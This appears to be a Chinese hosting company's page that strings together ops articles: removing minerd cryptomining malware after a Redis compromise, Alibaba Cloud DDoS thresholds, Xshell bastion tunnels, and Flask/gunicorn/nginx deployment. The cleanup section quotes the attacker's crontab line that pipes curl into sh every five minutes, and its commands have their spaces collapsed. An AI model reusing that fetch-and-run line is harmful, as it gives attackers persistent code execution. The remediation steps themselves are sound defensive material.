十年网站开发经验+多家企业客户+靠谱的建站团队
量身定制+运营维护+专业推广+无忧售后,网站问题一站解决
1.关闭访问挖矿服务器的访问
iptables-AINPUT-sxmr.crypto-pool.fr-jDROPandiptables-AOUTPUT-dxmr.crypto-pool.fr-jDROP.
2.chmod-xminerd,取消掉执行权限,在没有找到根源前,千万不要删除minerd,因为删除了,过一回会自动有生成一个。
3.pkillminerd,杀掉进程
4.servicestopcrond或者crontab-r删除所有的执行计划
5.执行top,查看了一会,没有再发现minerd进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5****curl-fsSL|sh
病毒文件内容如下,感兴趣的可以研究下:
ViewCode
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:
1.修复redis的后门,
配置bind选项,限定可以连接Redis服务器的IP,并修改redis的默认端口6379.
配置AUTH,设置密码,密码会以明文方式保存在redis配置文件中.
好消息是Redis作者表示将会开发”realuser”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2.打开~/.ssh/authorized_keys,删除你不认识的账号
3.查看你的用户列表,是不是有你不认识的用户添加进来。如果有就删除掉.
阿里云服务器能抗ddos吗?可以抗多少流量的ddos?是部分担心遭到DDOS攻击的用户比较关心的问题,因为网站遭遇到DDoS攻击是很多用户非常烦恼的事情,网站一旦遭到DDOS攻击很容易导致网站无法访问而又难以解决,阿里云服务器都有一定的DDoS基础防护,下面我们一起看看!
阿里云服务器能抗ddos吗?
阿里云服务器根据地域和配置的不同,可以免费抗一定流量的DDOS攻击,但是超过初始黑洞触发阈值就抗不了了,会进入黑洞。
阿里云服务器可以抗多少流量的ddos?
用户在购买阿里云服务器之后,云盾DDoS基础防护会为用户提供一定的DDoS基础防护,各个地域默认初始黑洞触发阈值如下表所示(单位:bps)。参考资料:DDOS防护
默认的黑洞时长是2.5个小时,黑洞期间不支持解封。实际黑洞时长视攻击情况而定,从30分钟到24小时不等。黑洞时长主要受以下因素影响:
作为用户,我们应该如何防止云服务器被DDOS?
我们在使用阿里云服务器的时候,我给出几个建议。
1、挂cdn隐藏IP,在换成新的ip后,请务必挂cdn对真实的ip进行隐藏。参考资料:阿里云CDN-内容分发网络-CDN网站加速
2、cdn还可以不止套一层,可以多层一起嵌套。
4、主域名可以随时解析到任意一个反向代理服务器,并且可以挂免费的云监控来实时知晓状态,一个节点死了改解析就行。
以上是比较简单,低成本的方法,如果钱多的话,建议购买阿里云高防IP和高防CDN等防御产品,这样针对不同场景不同的环节也有针对性的防御方案。
小菜运维仅仅只是一位菜鸟运维
Xshell的隧道转发类型共有三种,这里我们不展开介绍各自的应用场景,大家可以自行了解,我们这里选用的是Dynamic,可以实现自动连接内网ECS,也可直接连接FTP,但是前提是必须先连接跳板机建立起隧道,然后再连接内网ECS
隧道类型:
Local(Outgoing)
Dynamic(SOCKS4/5)
Remote(Incoming)
1.连接跳板机
1.1建立到跳板机的会话
1.2建立跳板机隧道
在上一步的对话框中,继续点击左侧隧道-添加,在弹出的转移规则对话框中完成规则设置,这里要强调的是源主机是指你当前建立隧道连接的本地机器,一般填入localhost或127.0.0.1即可,而目标主机则是指你要远程连接的远程服务器,具体配置信息如下图:
2.建立远程主机连接
2.1建立到远程主机的会话
Xshell选择新建会话,点击左侧连接,在常规栏依次填入会话名称、本机/本地IP、本机/本地监听端口,然后依次完成用户身份验证设置,这里需要强调的一点是,务必记得这里设置的连接主机地址1.2中设置转移规则时填写的源主机地址,而不是远程服务器的IP地址,同样的,这里设置的端口号也是1.2中设置转移规则时填写的侦听端口,但是用户身份验证需要填写远程服务器的用户信息。具体操作如下图:
3.SSH/SFTP到远程服务器
自动连接远程服务器的前提是先连接到跳板机/堡垒机,然后再连接到远程服务器。
这里和Local(Outgoing)方式的步骤完全相同,可参照之前步骤操作。
这里和Local(Outgoing)方式的区别在于转移规则的配置,具体配置信息如下图:
这里和Local(Outgoing)方式的区别在于主机和端口号的配置,这里的主机和端口号都是配置的远程服务器的,用户身份验证同样还是需要填写远程服务器的用户信息。具体操作如下图:
2.2建立到远程主机会话的代理
在上一步2.1建立到远程主机的会话的对话框左侧,点击代理,然后浏览并添加代理服务器,这里我们代理服务器设置的就是本地机器,要注意的是这里代理服务器的监听端口必须和1.2中隧道转移规则设置的侦听端口保持一致,具体配置如下图:
基于隧道可以简化很多体力操作,感觉起来就好像堡垒机不存在一样,实际操作中推荐使用Dynamic(SOCKS4/5)方式,因为Dynamic(SOCKS4/5)方式对于跳板机后有多台远程服务器需要连接的场景只需要配置一次隧道和代理,之后就可以直接添加到远程服务器的会话就可以了;而Local(Outgoing)方式则需要为每一台远程服务器添加一个单独的隧道才可以。
如果按照以上步骤操作仍然不能正常访问,那么……建议你联系你的堡垒机管理员,可能是堡垒机帐号/凭据/权限等的设置没有给足你权限。
附-参考文档:
阿里云·堡垒机
阿里云·透明代理
当我们执行下面的hello.py时,使用的flask自带的服务器,完成了web服务的启动。在生产环境中,flask自带的服务器,无法满足性能要求,我们这里采用Gunicorn做wsgi容器,来部署flask程序。Gunicorn(绿色独角兽)是一个PythonWSGI的HTTP服务器。从Ruby的独角兽(Unicorn)项目移植。该Gunicorn服务器与各种Web框架兼容,实现非常简单,轻量级的资源消耗。Gunicorn直接用命令启动,不需要编写配置文件,相对uWSGI要容易很多。
区分几个概念:
WSGI:全称是WebServerGatewayInterface(web服务器网关接口),它是一种规范,它是web服务器和web应用程序之间的接口。它的作用就像是桥梁,连接在web服务器和web应用框架之间。
uwsgi:是一种传输协议,用于定义传输信息的类型。
uWSGI:是实现了uwsgi协议WSGI的web服务器。
我们的部署方式:nginx+gunicorn+flask
web开发中,部署方式大致类似。简单来说,前端代理使用Nginx主要是为了实现分流、转发、负载均衡,以及分担服务器的压力。Nginx部署简单,内存消耗少,成本低。Nginx既可以做正向代理,也可以做反向代理。
正向代理:请求经过代理服务器从局域网发出,然后到达互联网上的服务器。
特点:服务端并不知道真正的客户端是谁。
反向代理:请求从互联网发出,先进入代理服务器,再转发给局域网内的服务器。
特点:客户端并不知道真正的服务端是谁。
区别:正向代理的对象是客户端。反向代理的对象是服务端。
查看命令行选项:安装gunicorn成功后,通过命令行的方式可以查看gunicorn的使用信息。
直接运行:
指定进程和端口号:-w:表示进程(worker)。-b:表示绑定ip地址和端口号(bind)。--access-logfile:表示指定log文件的路径
作为守护进程后台运行:
阿里云服务器默认安装到/user/sbin/目录,进入目录,启动ngnix:
Ubuntu上配置Nginx也是很简单,不要去改动默认的nginx.conf只需要将/etc/nginx/sites-available/default文件替换掉就可以了。
新建一个default文件,添加以下内容:
修改完成后重启nginx即可。
Ubuntu上配置Nginx另一种方法,cd到/etc/nginx/conf.d文件夹,新建xxx.conf文件(xxx可以是项目名,只要是.conf文件即可),写入以下内容: